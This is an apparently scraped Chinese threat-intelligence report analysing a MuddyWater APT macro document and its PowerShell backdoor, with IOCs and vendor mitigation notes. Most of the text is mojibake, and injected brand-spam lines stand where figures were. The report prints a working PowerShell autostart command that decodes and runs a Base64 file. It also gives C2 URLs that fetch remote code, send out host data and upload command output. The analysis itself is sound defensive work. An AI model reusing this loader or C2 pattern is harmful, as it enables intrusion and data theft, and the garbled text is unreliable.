MuddyWater£¨ÎÛË®£©×îй¥»÷Ñù±¾·ÖÎö

°ä²¼¹¦·ò 2019-05-10
MuddyWaterÊÇÒ»¸öÀ´×ÔÓÚÒÁÀʵÄÖØÒªÕë¶ÔÖж«µØÓò½øÐй¥»÷µÄAPT×éÖ¯ £¬Æä¹¥»÷Ö¸±êÖØÒª¼¯ÖÐÓÚµ±¾Ö¡¢µçÐż°ÄÜÔ´µÈÁìÓò¡£

½üÈÕ £¬±¦ÔËÀ³¹Ù·½ÍøÕ¾½ð¾¦°²È«×êÑÐÍŶÓͨ¹ýVenusEyeÍþвµý±¨ÖÐÐÄá÷ÁÔϵͳ²¶»ñµ½Ò»¸ö¿ÉÒÉÎĵµ £¬¾­¹ý¶ÈÎöÈ·ÈÏÆäΪMuddyWater×îй¥»÷Ñù±¾¡£


ÔØºÉ·ÖÎö


¹¥»÷Ñù±¾ÎªÒ»¸öWordÎĵµ £¬´ò¿ªºó»áÏÔʾÈçÏÂͼƬ £¬ÓÕʹÊܺ¦Õ߯ôÓúê¡£

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾

ºê´úÂëÖ´Ðкó £¬»á¿ªÊÍc:\programdata\SysTextEnc.iniÎļþ¡£¸ÃÎļþÄÚÈÝΪһ´®Base64±àÂëÊý¾Ý¡£

¶øºóÏòÆô¶¯ÏîдÈëÈçϺÅÁîÐУº
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

ÓÃÓÚ¿ª»ú½âÃܲ¢Ö´ÐÐc:\programdata\SysTextEnc.iniÎļþ¡£½âÃÜÖ®ºóΪһ¶Îpowershell´úÂë £¬¸Ã´úÂëÓÃÓÚÒªÇóhxxp://38.132.99.167/crf.txtÁ´½ÓµÄÊý¾Ý²¢Ö´ÐÐ £¬¸ÃÁ´½Ó·µ»ØµÄÊý¾ÝÒÀÈ»ÊÇÒ»¶ÎPowershell´úÂë¡£
 

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾



ľÂí·ÖÎö


ÉÏÊö¹ý³ÌÖÐÏÂÔØµÄPowershell´úÂë¼´MuddyWater×éÖ¯¹ßÓõÄpowershellľÂí¡£

½â»ìºÏºó £¬ÆäÖ÷º¯ÊýÈçÏÂËùʾ£º

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾

˳´ÎÖ´ÐÐwlChecul £¬pmrHlsl £¬GECOANOO £¬gfxEcmdascrsltpÕâËĸöº¯Êý¡£ÆäÖÐwlCheculÖ»ÊÇΪÁËÈ·ÈÏ·þÎñÆ÷³ï±¸×´Ì¬¡£»ú¹ØÈçÏÂURL²¢ÒÔPOST·½Ê½·¢ËÍÒªÇó£º
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

ÈôÊÇ·µ»ØÖµ²»Îª¿ÕÇÒ²»Îª%COPYTHAT%²Å»áÖ´ÐкóÐøº¯Êý¡£Ö®ºóÖ´ÐÐpmrHlslº¯Êý £¬¸Ãº¯Êý»áŲÓÃWMI»ñÈ¡¶àÖÖÍÆËã»úÐÅÏ¢¡£
 
±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾

½«»ñµÃµÄÐÅϢʹÓá°*¡±½øÐÐÆ´½Ó¡£ÍÆËãÆ´½Óºó×Ö·û´®µÄMD5 £¬Ôٺ͡°*1997* EP1¡±½øÐÐÆ´½Ó £¬×îºó½øÐÐbase64±àÂë¡£

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾
 
Ö®ºó½«»ú¹Ø³öÀ´µÄBase64±àÂëÊý¾ÝÆ´½Ó³ÉÈçÏÂURL²¢ÒÔPOST·½Ê½·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

ÈôÊÇ·µ»ØÁ˾ֲ»Îª¿Õ²¢ÇÒ²»Îª%BYE%Ôò³ÖÐøºóÐøº¯ÊýµÄÖ´ÐС£½ÓÏÂÀ´ÒªÖ´Ðеĺ¯ÊýΪGECOANOO¡£

GeCOANOOº¯Êý»ú¹ØÈçÏÂÊý¾Ý £¬²¢ÒÔPOST·½Ê½½«Æä·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

ÆäÖеÄEncryptedData¼´ÉÏÒ»´Î·¢ËÍÊý¾ÝÖнøÐÐBase64±àÂëµÄMD5²¿ÃÅ¡£ÈôÊÇ·µ»ØÁ˾ֲ»Îª¿ÕÇÒ·µ»ØÖµ¾­¹ýbase64½âÂëºó²»Îª"SHH" £¬Ôò½«½âÂëºóµÄ·µ»ØÖµ¸³Öµ¸øÒ»¸öÈ«¾Ö±äÁ¿gecdrEu £¬¶øºóÖ´ÐÐÏÂÒ»¸öº¯Êý £¬Äܹ»Åжϸ³Öµ¸øgecdrEuµÄÊý¾ÝΪһ¶Îpowershell´úÂë¡£
 
±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾

×îºóͨ¹ýgfxEcmdascrsltpº¯ÊýÖ´ÐÐÈ«¾Ö±äÁ¿ÖеÄgecdrEuÖеÄpowershell´úÂë¡£
 
±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾

²¢½«·µ»ØÖµ½øÐÐbase64±àÂë £¬Æ´´Õ³ÉÈçϵÄURLÌåʽ½øÐÐÉÏ´«¡£
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]


ËÝÔ´·ÖÎö


ͨ¹ýVenusEyeÍþвµý±¨ÖÐÐĹØÁªÏµÍ³ £¬ÎÒÃÇ·¢ÏÖÁËÁíÒ»¸öÔçÆÚµÄÑù±¾¡£

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾

¸ÃÑù±¾ËùʹÓõļ¼Êõ¶¼Óë±¾´ÎÎÒÃÇ·¢ÏÖµÄÑù±¾Ç§ÆªÒ»ÂÉ¡£

ͨ¹ýËÝÔ´·ÖÎö £¬ÎÒÃÇ·¢ÏÖÕâÁ½¸öÑù±¾¶¼ÓëÓÑÉÌ4ÔÂ10ÈÕÔÚÉ罻ýÌåÉÏÅû¶µÄMuddyWater¹¥»÷ÍÁ¶úÆäµÄÑù±¾ÀàËÆ¡£ÏÂÃæÊÇÁ½Õߵĺê´úÂë¶Ô±È¡£

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


ͨ¹ý¶Ô±ÈÄܹ»·¢ÏÖ £¬¶þÕß¶¼Ê¹ÓÃÒ»ÑùµÄ·½Ê½»ñÈ¡ÍÆËã»úÐÅÏ¢ £¬¶øºóʹÓÃÒ»ÑùµÄÍÆËã·½Ê½ÍÆËãÊܺ¦ÕßÖ÷»úµÄΨһ±êʶ¡£

 

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


Ïà±È֮Ϡ£¬ÔçÆÚ·¢ÏÖµÄÑù±¾½«ÉÏÏßÒªÇó¡¢»ñÈ¡powershell´úÂë¡¢ÉÏ´«ºÅÁîÐÐÖ´ÐÐÁ˾ֲð·Ö³É·ÖÆçPHP½øÐн»»¥¡£¶ø´Ë¿ÌµÄ°æ±¾ÔòʹÓÃͳһ¸öPHPÎļþ½øÐн»»¥¡£²¢ÇÒÔçÆÚ°æ±¾ÈôÊÇÔÚÖ´Ðйý³ÌÖÐÓöµ½ÃýÎó £¬Ôò»á½«ÃýÎóÐÅÏ¢¼Í¼ÈÕÖ¾ £¬µ«ÊÇ×îа汾ÔòÖ±½ÓʵÏÖµ±Ç°·¨Ê½¡£

¶ÔÓÚÖ´ÐÐÁ÷³ÌÀ´Ëµ £¬×îа汾Ïà¶ÔÓÚÔçÆÚ°æ±¾Ò²Óнϴó·ÖÆç £¬¶þÕßµÄÖ´ÐÐÁ÷³ÌÈçÏ£º

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾
 
Ïà±È֮Ϡ£¬×îÐµĹ¥»÷»î¶¯Ôö³¤ÁËÆä»ù´¡ÉèÊ© £¬²¢ÇÒ½«Ö÷Ìå´úÂë¸éÖõ½Ô¶³Ì·þÎñÆ÷Öжø²»ÊÇÖ±½Óͨ¹ý´¹µöÎĵµ¿ªÊ͵½±¾µØ¡£Äܹ»¿´³ö¸Ã×éÖ¯ÔÚ²»ÐݵĸüÐÂÆä¹¥»÷·½Ê½ºÍ·À¼ì²â·½Ê½¡£



×ܽá


MuddyWater×éÖ¯×ÔÅû¶֮³õÒ»Ïò»îÔ¾ÖÁ½ñ £¬¸Ã×éÖ¯¼«¶ÈÇàíùʹÓÃPowershell½ÅÕý±¾±àдÆä¹¥»÷¹¤¾ß £¬²¢ÑÜÉú³öÁ˸Ã×éÖ¯µÄרÓÐľÂíPOWERSTATS¡£¹ÌÈ»¸Ã×éÖ¯µÄPowershellľÂí¸üл»´úºÜ¿ì £¬µ«ÊÇÎÒÃÇÈÔÄÜ´ÓÆäpowershell´úÂëÖп´µ½Ð©ÐíPOWERSTATSµÄÓ°×Ó¡£


Íþвָ±ê£¨IOC£©


97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt


½â¾ö¹æ»®


1¡¢±¦ÔËÀ³¹Ù·½ÍøÕ¾VenusEyeÍþвµý±¨ÖÐÐÄÒѾ­Ö§³Ö¶Ô±¾´Î¹¥»÷»î¶¯Óйصý±¨µÄ²éÎÊ¡£

2¡¢ ÒѲ¿Êð±¦ÔËÀ³¹Ù·½ÍøÕ¾IDS¡¢IPS²úÆ·µÄ¿Í»§ÇëÉý¼¶ÊÂÎñ¿âµ½×îа汾 £¬¼´¿ÉÓÐЧ¼ì²â»ò×è¶Ï¹¥»÷¡£

3¡¢ ÒѲ¿Êð±¦ÔËÀ³¹Ù·½ÍøÕ¾APT¼ì²â²úÆ·µÄ¿Í»§ÎÞÐèÉý¼¶ £¬¼´¿ÉÓÐЧ¼ì²âÕâ´Î¹¥»÷¡£

 

±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾